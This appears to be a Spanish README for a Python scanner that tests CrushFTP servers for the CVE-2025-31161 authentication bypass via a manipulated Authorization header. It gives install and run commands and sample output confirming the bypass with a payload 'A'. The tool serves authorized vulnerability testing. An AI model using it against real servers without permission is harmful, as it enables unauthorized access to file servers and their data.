
Escanea el objetivo para ver si es vulnerable a CVE-2025-31161
Una herramienta en Python para detectar y probar la vulnerabilidad CVE-2025-31161 en servidores CrushFTP.
Este script prueba la vulnerabilidad de omisión de autenticación (CVE-2025-31161) en servidores CrushFTP que permite a atacantes remotos autenticarse sin credenciales válidas mediante la manipulación de la cabecera HTTP Authorization.
python3 CVE-2025-31161.py
git clone https://github.com/yourusername/CVE-2025-31161.py
cd CVE-2025-31161.py
pip3 install -r requirements.txt
$ python3 CVE-2025-31161.py
Introduce la dirección IP del objetivo: 192.168.1.100
Introduce el puerto del objetivo [8080]: 8080
==================================================
📡 Probando: /WebInterface/
🔑 Payload: 'A'
📊 Estado: 200
🎉 VULNERABILIDAD CONFIRMADA
💡 200 OK con contenido: dashboard, main
✅ Payload funcional: 'A'
==================================================
🎯 Objetivo: 192.168.1.100:8080
🔴 ESTADO DE VULNERABILIDAD: VULNERABLE
💥 Omisión de autenticación CVE-2025-31161 CONFIRMADA
✅ Payloads funcionales:
==================================================
Esta herramienta es solo para fines educativos y de pruebas autorizadas. Úsala únicamente en sistemas que poseas o sobre los que tengas permiso explícito para realizar pruebas.